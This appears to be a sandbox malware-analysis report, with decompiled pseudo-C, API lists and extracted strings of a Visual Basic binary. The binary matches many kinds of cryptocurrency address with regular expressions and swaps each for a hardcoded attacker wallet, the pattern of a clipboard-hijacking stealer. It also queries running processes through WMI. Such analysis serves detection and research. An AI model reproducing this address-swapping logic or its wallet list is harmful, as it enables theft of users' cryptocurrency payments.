														_v76 = L"8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA";
														goto L121;
													}
												} else {
													_v76 = L"\\b(DdzFF.*)|(addr1.*)|(Ae2.*)\\b";
													_v84 = _t629;
													L00401376();
													_t457 = E00416178(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
													goto L6;
												}
											} else {
												if(_v48 == 0) {
													_push( &_v48);
													_push(0x412750);
													L0040131C();
												}
												_t624 = _v48;
												_t502 =  *((intOrPtr*)( *_t624 + 0x20))(_t624, L"\\bA[0-9a-zA-Z]{33}\\b");
												asm("fclex");
												if(_t502 < 0) {
													_push(0x20);
													_push(0x412740);
													_push(_t624);
													_push(_t502);
													L00401322();
												}
												_t460 = _v48;
												if(_t460 == 0) {
													_push( &_v48);
													_push(0x412750);
													L0040131C();
													_t460 = _v48;
												}
												_v104 = _t460;
												_v76 = L"AYVbHuVPWRd5KbDmwXhNXJ3oVZCgrUFbEn";
												goto L121;
											}
										} else {
											if(_v48 == 0) {
												_push( &_v48);
												_push(0x412750);
												L0040131C();
											}
											_t625 = _v48;
											_t506 =  *((intOrPtr*)( *_t625 + 0x20))(_t625, L"\\bX[1-9A-HJ-NP-Za-km-z]{33}\\b");
											asm("fclex");
											if(_t506 < 0) {
												_push(0x20);
												_push(0x412740);
												_push(_t625);
												_push(_t506);
												L00401322();
											}
											_t460 = _v48;
											if(_t460 == 0) {
												_push( &_v48);
												_push(0x412750);
												L0040131C();
												_t460 = _v48;
											}
											_v104 = _t460;
											_v76 = L"XnLLQs7esH6XMFREhuFfirgDBwm8QuRoGH";
											goto L121;
										}
									} else {
										_v76 = L"\\bD{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}\\b";
										_v84 = _t629;
										L00401376();
										_t457 = E00416A06(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
										goto L6;
									}
								} else {
									_v76 = L"\\b(ltc1|[LM])[a-zA-HJ-NP-Z0-9]{26,40}\\b";
									_v84 = _t629;
									L00401376();
									_t457 = E00414CC1(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
									goto L6;
								}
							} else {
								_v76 = L"\\b((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}\\b";
								_v84 = _t629;
								L00401376();
								_t457 = E004166F9(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
								goto L6;
							}
						} else {
							if(_v48 == 0) {
								_push( &_v48);
								_push(0x412750);
								L0040131C();
							}
							_t626 = _v48;
							_t516 =  *((intOrPtr*)( *_t626 + 0x20))(_t626, L"\\b4([0-9]|[A-J])(.){93,106}\\b");
							asm("fclex");
							if(_t516 < 0) {
								_push(0x20);
								_push(0x412740);
								_push(_t626);
								_push(_t516);
								L00401322();
							}
							_t460 = _v48;
							if(_t460 == 0) {
								_push( &_v48);
								_push(0x412750);
								L0040131C();
								_t460 = _v48;
							}
							_v104 = _t460;
							_v76 = L"4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV";
							L121:
							_v84 = _t629;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t457 =  *((intOrPtr*)( *_t460 + 0x44))(_t460,  *0x419028,  &_v52);
							asm("fclex");
							if(_t457 < 0) {
								_push(0x44);
								_push(0x412740);
								_push(_v104);
								_push(_t457);
								L00401322();
							}
							_v52 = _v52 & 0x00000000;
							L0040136A();
						}
					} else {
						_v76 = L"\\b0x[a-fA-F0-9]{40}\\b";
						_v84 = _t629;
						L00401376();
						_t457 = E00416446(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
						goto L6;
					}
				} else {
					_v76 = L"\\b([13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-zAC-HJ-NP-Z02-9]{11,71})\\b";
					_v84 = _t629;
					L00401376();
					_t457 = E0041372E(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
					L6:
					L00401352();
				}
				_push( *0x419028);
				_push(_v172);
				L00401316();
				if(_t457 == 0) {
				}
				L00401328();
				_push(0x417aee);
				L00401352();
				L0040132E();
				return _t457;
			}




































































              0x00416f94
              0x00416f97
              0x00416fa2
              0x00416fa3
              0x00416fb0
              0x00416fb1
              0x00416fb2
              0x00416fb3
              0x00416fb6
              0x00416fcb
              0x00416fce
              0x00416fd1
              0x00416fd4
              0x00416fd7
              0x00416fda
              0x00416fdd
              0x00416fe0
              0x00416fe7
              0x00416fed
              0x00416ff5
              0x00416ffa
              0x00416ffb
              0x00417000
              0x00417000
              0x00417005
              0x0041700d
              0x00417012
              0x00417014
              0x00417016
              0x00417018
              0x0041701d
              0x0041701e
              0x0041701f
              0x0041701f
              0x00417029
              0x0041702d
              0x00417034
              0x00417037
              0x00417047
              0x0041704a
              0x0041704d
              0x00417054
              0x00417057
              0x00417064
              0x0041706c
              0x00417070
              0x0041707a
              0x0041707d
              0x00417080
              0x004170b7
              0x004170be
              0x004170c1
              0x004170ce
              0x004170d6
              0x004170da
              0x004170e4
              0x004170e7
              0x004170ea
              0x00417116
              0x0041711d
              0x00417120
              0x0041712d
              0x00417135
              0x00417139
              0x00417143
              0x004171a8
              0x004171ab
              0x004171ae
              0x004171b5
              0x004171b8
              0x004171c5
              0x004171cd
              0x004171d1
              0x004171db
              0x004171de
              0x004171e1
              0x00417210
              0x00417217
              0x0041721a
              0x00417227
              0x0041722f
              0x00417233
              0x0041723d
              0x00417240
              0x00417243
              0x00417272
              0x00417279
              0x0041727c
              0x00417289
              0x00417291
              0x00417295
              0x0041729f
              0x004172a2
              0x004172a5
              0x004172d4
              0x004172db
              0x004172de
              0x004172eb
              0x004172f3
              0x004172f7
              0x00417301
              0x00417366
              0x00417369
              0x0041736c
              0x00417373
              0x00417376
              0x00417383
              0x0041738b
              0x0041738f
              0x00417399
              0x004173fe
              0x00417401
              0x00417404
              0x0041740b
              0x0041740e
              0x0041741b
              0x00417423
              0x00417427
              0x00417431
              0x00417434
              0x00417437
              0x00417466
              0x0041746d
              0x00417470
              0x0041747d
              0x00417485
              0x00417489
              0x00417493
              0x004174f8
              0x004174fb
              0x004174fe
              0x00417505
              0x00417508
              0x00417515
              0x0041751d
              0x00417521
              0x0041752b
              0x00417590
              0x00417593
              0x00417596
              0x0041759d
              0x004175a0
              0x004175ad
              0x004175b5
              0x004175b9
              0x004175c3
              0x00417628
              0x0041762b
              0x0041762e
              0x00417635
              0x00417638
              0x00417645
              0x0041764d
              0x00417651
              0x0041765b
              0x004176c0
              0x004176c3
              0x004176c6
              0x004176cd
              0x004176d0
              0x004176dd
              0x004176e5
              0x004176e9
              0x004176f3
              0x00417758
              0x0041775b
              0x0041775e
              0x00417765
              0x00417768
              0x00417775
              0x0041777d
              0x00417781
              0x0041778b
              0x004177f0
              0x004177f3
              0x004177f6
              0x004177fd
              0x00417800
              0x0041780d
              0x00417815
              0x00417819
              0x00417823
              0x00417888
              0x0041788b
              0x0041788e
              0x00417895
              0x00417898
              0x004178a5
              0x004178ad
              0x004178b1
              0x004178bb
              0x00417920
              0x00417923
              0x00417926
              0x0041792d
              0x00417930
              0x0041793d
              0x00417945
              0x00417949
              0x00417953
              0x004179b2
              0x004179b5
              0x004179c0
              0x004179c3
              0x004179c6
              0x004179c9
              0x004179d6
              0x004179de
              0x004179e2
              0x004179ec
              0x004179f2
              0x004179f7
              0x004179fc
              0x004179fd
              0x00417a02
              0x00417a07
              0x00417a07
              0x00417a0e
              0x00417a11
              0x00417a16
              0x00417a18
              0x00417a1a
              0x00417a1c
              0x00417a21
              0x00417a24
              0x00417a25
              0x00417a25
              0x00417a2a
              0x00417a2f
              0x00417a34
              0x00417a35
              0x00417a3a
              0x00417a3f
              0x00417a3f
              0x00417a42
              0x00417a45
              0x00000000
              0x00417a45
              0x00417955
              0x00417959
              0x0041795e
              0x0041795f
              0x00417964
              0x00417964
              0x00417969
              0x00417974
              0x00417979
              0x0041797b
              0x0041797d
              0x0041797f
              0x00417984
              0x00417985
              0x00417986
              0x00417986
              0x0041798b
              0x00417990
              0x00417995
              0x00417996
              0x0041799b
              0x004179a0
              0x004179a0
              0x004179a3
              0x004179a6
              0x00000000
              0x004179a6
              0x004178bd
              0x004178c1
              0x004178c6
              0x004178c7
              0x004178cc
              0x004178cc
              0x004178d1
              0x004178dc
              0x004178e1
              0x004178e3
              0x004178e5
              0x004178e7
              0x004178ec
              0x004178ed
              0x004178ee
              0x004178ee
              0x004178f3
              0x004178f8
              0x004178fd
              0x004178fe
              0x00417903
              0x00417908
              0x00417908
              0x0041790b
              0x0041790e
              0x00000000
              0x0041790e
              0x00417825
              0x00417829
              0x0041782e
              0x0041782f
              0x00417834
              0x00417834
              0x00417839
              0x00417844
              0x00417849
              0x0041784b
              0x0041784d
              0x0041784f
              0x00417854
              0x00417855
              0x00417856
              0x00417856
              0x0041785b
              0x00417860
              0x00417865
              0x00417866
              0x0041786b
              0x00417870
              0x00417870
              0x00417873
              0x00417876
              0x00000000
              0x00417876
              0x0041778d
              0x00417791
              0x00417796
              0x00417797
              0x0041779c
              0x0041779c
              0x004177a1
              0x004177ac
              0x004177b1
              0x004177b3
              0x004177b5
              0x004177b7
              0x004177bc
              0x004177bd
              0x004177be
              0x004177be
              0x004177c3
              0x004177c8
              0x004177cd
              0x004177ce
              0x004177d3
              0x004177d8
              0x004177d8
              0x004177db
              0x004177de
              0x00000000
              0x004177de
              0x004176f5
              0x004176f9
              0x004176fe
              0x004176ff
              0x00417704
              0x00417704
              0x00417709
              0x00417714
              0x00417719
              0x0041771b
              0x0041771d
              0x0041771f
              0x00417724
              0x00417725
              0x00417726
              0x00417726
              0x0041772b
              0x00417730
              0x00417735
              0x00417736
              0x0041773b
              0x00417740
              0x00417740
              0x00417743
              0x00417746
              0x00000000
              0x00417746
              0x0041765d
              0x00417661
              0x00417666
              0x00417667
              0x0041766c
              0x0041766c
              0x00417671
              0x0041767c
              0x00417681
              0x00417683
              0x00417685
              0x00417687
              0x0041768c
              0x0041768d
              0x0041768e
              0x0041768e
              0x00417693
              0x00417698
              0x0041769d
              0x0041769e
              0x004176a3
              0x004176a8
              0x004176a8
              0x004176ab
              0x004176ae
              0x00000000
              0x004176ae
              0x004175c5
              0x004175c9
              0x004175ce
              0x004175cf
              0x004175d4
              0x004175d4
              0x004175d9
              0x004175e4
              0x004175e9
              0x004175eb
              0x004175ed
              0x004175ef
              0x004175f4
              0x004175f5
              0x004175f6
              0x004175f6
              0x004175fb
              0x00417600
              0x00417605
              0x00417606
              0x0041760b
              0x00417610
              0x00417610
              0x00417613
              0x00417616
              0x00000000
              0x00417616
              0x0041752d
              0x00417531
              0x00417536
              0x00417537
              0x0041753c
              0x0041753c
              0x00417541
              0x0041754c
              0x00417551
              0x00417553
              0x00417555
              0x00417557
              0x0041755c
              0x0041755d
              0x0041755e
              0x0041755e
              0x00417563
              0x00417568
              0x0041756d
              0x0041756e
              0x00417573
              0x00417578
              0x00417578
              0x0041757b
              0x0041757e
              0x00000000
              0x0041757e
              0x00417495
              0x00417499
              0x0041749e
              0x0041749f
              0x004174a4
              0x004174a4
              0x004174a9
              0x004174b4
              0x004174b9
              0x004174bb
              0x004174bd
              0x004174bf
              0x004174c4
              0x004174c5
              0x004174c6
              0x004174c6
              0x004174cb
              0x004174d0
              0x004174d5
              0x004174d6
              0x004174db
              0x004174e0
              0x004174e0
              0x004174e3
              0x004174e6
              0x00000000
              0x004174e6
              0x00417439
              0x0041743f
              0x00417446
              0x00417449
              0x00417456
              0x00000000
              0x00417456
              0x0041739b
              0x0041739f
              0x004173a4
              0x004173a5
              0x004173aa
              0x004173aa
              0x004173af
              0x004173ba
              0x004173bf
              0x004173c1
              0x004173c3
              0x004173c5
              0x004173ca
              0x004173cb
              0x004173cc
              0x004173cc
              0x004173d1
              0x004173d6
              0x004173db
              0x004173dc
              0x004173e1
              0x004173e6
              0x004173e6
              0x004173e9
              0x004173ec
              0x00000000
              0x004173ec
              0x00417303
              0x00417307
              0x0041730c
              0x0041730d
              0x00417312
              0x00417312
              0x00417317
              0x00417322
              0x00417327
              0x00417329
              0x0041732b
              0x0041732d
              0x00417332
              0x00417333
              0x00417334
              0x00417334
              0x00417339
              0x0041733e
              0x00417343
              0x00417344
              0x00417349
              0x0041734e
              0x0041734e
              0x00417351
              0x00417354
              0x00000000
              0x00417354
              0x004172a7
              0x004172ad
              0x004172b4
              0x004172b7
              0x004172c4
              0x00000000
              0x004172c4
              0x00417245
              0x0041724b
              0x00417252
              0x00417255
              0x00417262
              0x00000000
              0x00417262
              0x004171e3
              0x004171e9
              0x004171f0
              0x004171f3
              0x00417200
              0x00000000
              0x00417200
              0x00417145
              0x00417149
              0x0041714e
              0x0041714f
              0x00417154
              0x00417154
              0x00417159
              0x00417164
              0x00417169
              0x0041716b
              0x0041716d
              0x0041716f
              0x00417174
              0x00417175
              0x00417176
              0x00417176
              0x0041717b
              0x00417180
              0x00417185
              0x00417186
              0x0041718b
              0x00417190
              0x00417190
              0x00417193
              0x00417196
              0x00417a4c
              0x00417a4f
              0x00417a5d
              0x00417a64
              0x00417a65
              0x00417a67
              0x00417a68
              0x00417a6d
              0x00417a6f
              0x00417a71
              0x00417a73
              0x00417a78
              0x00417a7b
              0x00417a7c
              0x00417a7c
              0x00417a84
              0x00417a8a
              0x00417a8a
              0x004170ec
              0x004170f2
              0x004170f9
              0x004170fc
              0x00417109
              0x00000000
              0x00417109
              0x00417082
              0x00417088
              0x0041708f
              0x00417092
              0x0041709f
              0x004170a4
              0x004170a7
              0x004170a7
              0x00417a8f
              0x00417a95
              0x00417a9b
              0x00417aa8
              0x00417aa8
              0x00417ab2
              0x00417ab7
              0x00417ae0
              0x00417ae8
              0x00417aed

              APIs
              • __vbaStrCopy.MSVBVM60(00000000,0000000A,00411CA4), ref: 00416FED
              • __vbaNew2.MSVBVM60(00412750,?,00000000,0000000A,00411CA4), ref: 00417000
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00412740,00000030), ref: 0041701F
              • __vbaVarCopy.MSVBVM60(00000000,?,00412740,00000030), ref: 00417037
              • __vbaVarDup.MSVBVM60(00000000,?,00412740,00000030), ref: 00417057
              • __vbaFreeVar.MSVBVM60(?,?), ref: 00417070
              • __vbaVarDup.MSVBVM60(?,?), ref: 00417092
              • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?), ref: 004170A7
              • __vbaVarDup.MSVBVM60(?,?), ref: 004170C1
                • Part of subcall function 004134FB: #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00413562
                • Part of subcall function 004134FB: __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 0041356F
                • Part of subcall function 004134FB: __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 0041357D
                • Part of subcall function 004134FB: __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 00413596
                • Part of subcall function 004134FB: __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 004135BB
                • Part of subcall function 004134FB: __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004135E0
                • Part of subcall function 004134FB: __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004135F5
                • Part of subcall function 004134FB: __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00413604
              • __vbaFreeVar.MSVBVM60(?,?,?,?), ref: 004170DA
              • __vbaVarDup.MSVBVM60(?,?,?,?), ref: 004170FC
                • Part of subcall function 00416446: #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164B6
                • Part of subcall function 00416446: __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164C3
                • Part of subcall function 00416446: __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164D1
                • Part of subcall function 00416446: __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 004164EA
                • Part of subcall function 00416446: __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 0041650F
                • Part of subcall function 00416446: __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416534
                • Part of subcall function 00416446: __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416549
                • Part of subcall function 00416446: __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416558
              • __vbaVarDup.MSVBVM60(?,?,?,?), ref: 00417120
              • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?), ref: 00417139
              • __vbaNew2.MSVBVM60(00412750,00000000,?,?,?,?,?,?), ref: 00417154
              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412740,00000020), ref: 00417176
              • __vbaNew2.MSVBVM60(00412750,00000000), ref: 0041718B
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?), ref: 004171B8
                • Part of subcall function 004134FB: __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 00413625
                • Part of subcall function 004134FB: __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00413632
                • Part of subcall function 004134FB: __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 0041365B
                • Part of subcall function 004134FB: __vbaVarAdd.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 0041367A
                • Part of subcall function 004134FB: __vbaVarMove.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 00413684
                • Part of subcall function 004134FB: __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 004136A9
                • Part of subcall function 004134FB: __vbaVarCmpGe.MSVBVM60(?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136C3
                • Part of subcall function 004134FB: __vbaBoolVar.MSVBVM60(00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136C9
                • Part of subcall function 004134FB: __vbaAryUnlock.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136E8
                • Part of subcall function 004134FB: __vbaFreeObj.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136F3
                • Part of subcall function 004134FB: __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136FB
                • Part of subcall function 004134FB: __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 00413703
                • Part of subcall function 004134FB: __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 0041370B
                • Part of subcall function 004134FB: __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 00413713
              • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?), ref: 004171D1
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?), ref: 004171F3
                • Part of subcall function 004166F9: #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416769
                • Part of subcall function 004166F9: __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416776
                • Part of subcall function 004166F9: __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416784
                • Part of subcall function 004166F9: __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 0041679D
                • Part of subcall function 004166F9: __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 004167C2
                • Part of subcall function 004166F9: __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004167E7
                • Part of subcall function 004166F9: __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004167FC
                • Part of subcall function 004166F9: __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 0041680B
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0041721A
              • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 00417233
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 00417255
              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412740,00000044,?,?,?,?), ref: 00417A7C
              • __vbaStrMove.MSVBVM60(?,?,?,?), ref: 00417A8A
              • __vbaStrCmp.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A9B
              • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417AB2
              • __vbaFreeVar.MSVBVM60(00417AEE,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417AE0
              • __vbaFreeObj.MSVBVM60(00417AEE,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417AE8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$Late$Varg$Move$#716CheckCopyHresultNew2Nofree$Each$BoolCallNextUnlock
              • String ID: 15hXAH4wYrCKz3R2MVRTaY3y8yqMePHova2KCwvQGd2shLDz$4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV$8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA$AYVbHuVPWRd5KbDmwXhNXJ3oVZCgrUFbEn$AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4$GDQHVF35R5DW5TH5QRF5XA754UABPCEVKKHPTPE3HXIMU5XOE5G5ZLDG$THYmz75uHVVbuJGGy2dv6BVy1W2iA8rqfm$VaxnygQcu3SgKp7hEZ79mF5wDGm22yp2zo$XIXWLMD7DIAHQQ6TQOFMVS5JTBS6IXVFY4KHENNWQUWM7TL7GE27IW67JM$XnLLQs7esH6XMFREhuFfirgDBwm8QuRoGH$\b((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}\b$\b(4|8)?[0-9A-Z]{1}[0-9a-zA-Z]{93}([0-9a-zA-Z]{11})?\b$\b(DdzFF.*)|(addr1.*)|(Ae2.*)\b$\b([13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-zAC-HJ-NP-Z02-9]{11,71})\b$\b(ltc1|[LM])[a-zA-HJ-NP-Z0-9]{26,40}\b$\b0x[a-fA-F0-9]{40}\b$\b1[0-9a-zA-Z]{46,47}\b$\b4([0-9]|[A-J])(.){93,106}\b$\bA[0-9a-zA-Z]{33}\b$\bD{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}\b$\bG[0-9a-zA-Z]{55}\b$\bT[0-9a-zA-Z]{33}\b$\bV[0-9a-zA-Z]{33,42}\b$\bX[1-9A-HJ-NP-Za-km-z]{33}\b$\b[0-9a-zA-Z]{44}\b$\bbnb[0-9a-zA-Z]{39}\b$\bdgb[0-9a-zA-Z]{40}\b$\br[0-9a-zA-Z]{33}\b$^(?!addr.*).{58}$$bnb1sy8wkqcayfpax9tn3wj8rmtd9pdw2asq0dd0xd$dgb1qq4mmfkgjxkg40y9p568nm396syq5x7cxpljjs7$rpQEW6WqhvuqqxfqPUhwA5s8zPENVddUBi
              • API String ID: 1992489938-1790931049
              • Opcode ID: 5032471cdf8095c1a91be09b11e60d869e6a3e1edb4ef14c7e688c2622343172
              • Instruction ID: 52c8c87c32352a58dc4c703ac3da98801b7842c6852d236e7058b05d260bda32
              • Opcode Fuzzy Hash: 5032471cdf8095c1a91be09b11e60d869e6a3e1edb4ef14c7e688c2622343172
              • Instruction Fuzzy Hash: 3D72D770D00358DADF10EFE5C985ADEB7B8BF08704F54812BE405BB291D7B89989CB59
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 56%
              			E00412C74(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				signed int _v56;
				signed int _v60;
				char _v76;
				intOrPtr _v84;
				char _v92;
				char _v108;
				char* _v116;
				char _v124;
				char _v148;
				char* _v172;
				intOrPtr* _t65;
				char* _t70;
				char* _t76;
				char* _t78;
				char* _t81;
				char* _t83;
				char* _t84;
				signed int _t87;
				void* _t108;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				void* _t115;

				_t111 = _t110 - 0x14;
				 *[fs:0x0] = _t111;
				_t112 = _t111 - 0x8c;
				_v24 = _t112;
				_v20 = E00401150;
				_t87 = 0;
				_v16 = 0;
				_v12 = 0;
				_t65 = _a4;
				 *((intOrPtr*)( *_t65 + 4))(_t65, __edi, __esi, __ebx,  *[fs:0x0], 0x401256, _t108);
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v56 = 0;
				_v60 = 0;
				_v76 = 0;
				_v92 = 0;
				_v108 = 0;
				_v124 = 0;
				_v148 = 0;
				_push(1);
				L0040138E();
				_v84 = 0x80020004;
				_v92 = 0xa;
				_v116 = L"winmgmts:";
				_v124 = 8;
				L00401376();
				_push( &_v92);
				_push( &_v76);
				_push( &_v108); // executed
				L0040137C(); // executed
				_t70 =  &_v108;
				_push(_t70);
				L00401382();
				_push(_t70);
				_push( &_v52);
				L00401388();
				_push( &_v108);
				_push( &_v92);
				_push( &_v76);
				_push(3);
				L00401370();
				_t76 =  *_a8;
				_v172 = _t76;
				_push(L"SELECT * FROM win32_process WHERE Name = \'");
				_push(_t76);
				L00401364();
				L0040136A();
				_push(_t76);
				_push(0x411c60);
				L00401364();
				L0040136A();
				L0040135E();
				_v116 =  &_v44;
				_v124 = 0x4008;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"execquery");
				_push(_v52);
				_t78 =  &_v76;
				_push(_t78); // executed
				L00401358(); // executed
				_t115 = _t112 + 0x10 - 0x10 + 0x20;
				_push(_t78);
				L00401382();
				_push(_t78);
				_push( &_v40);
				L00401388();
				L00401352();
				_push(_v40);
				_push( &_v48);
				_t81 =  &_v148;
				_push(_t81); // executed
				L0040134C(); // executed
				while(_t81 != _t87) {
					_v116 = _v172;
					_v124 = 0x8008;
					_push(_t87);
					_push(L"Name");
					_push(_v48);
					_t83 =  &_v76;
					_push(_t83);
					L00401358();
					_t115 = _t115 + 0x10;
					_push(_t83);
					_t84 =  &_v124;
					_push(_t84);
					L00401346();
					L00401352();
					if(_t84 != _t87) {
						_t87 = _t87 | 0xffffffff;
						_t81 =  &_v148;
						_push(_t81);
						L00401340();
					} else {
						_push( &_v48);
						_t81 =  &_v148;
						_push(_t81);
						L0040133A();
						continue;
					}
					break;
				}
				_v56 = _t87;
				L00401334();
				_push(0x412e91);
				L0040132E();
				L0040132E();
				L0040135E();
				L0040132E();
				L0040132E();
				return _t81;
			}


































              0x00412c77
              0x00412c86
              0x00412c8d
              0x00412c96
              0x00412c99
              0x00412ca0
              0x00412ca2
              0x00412ca5
              0x00412ca8
              0x00412cae
              0x00412cb1
              0x00412cb4
              0x00412cb7
              0x00412cba
              0x00412cbd
              0x00412cc0
              0x00412cc3
              0x00412cc6
              0x00412cc9
              0x00412ccc
              0x00412ccf
              0x00412cd5
              0x00412cd7
              0x00412cdc
              0x00412ce3
              0x00412cea
              0x00412cf1
              0x00412cfe
              0x00412d06
              0x00412d0a
              0x00412d0e
              0x00412d0f
              0x00412d14
              0x00412d17
              0x00412d18
              0x00412d1d
              0x00412d21
              0x00412d22
              0x00412d2a
              0x00412d2e
              0x00412d32
              0x00412d33
              0x00412d35
              0x00412d40
              0x00412d42
              0x00412d48
              0x00412d4d
              0x00412d4e
              0x00412d58
              0x00412d5d
              0x00412d5e
              0x00412d63
              0x00412d6d
              0x00412d75
              0x00412d7d
              0x00412d80
              0x00412d8f
              0x00412d90
              0x00412d91
              0x00412d92
              0x00412d93
              0x00412d95
              0x00412d9a
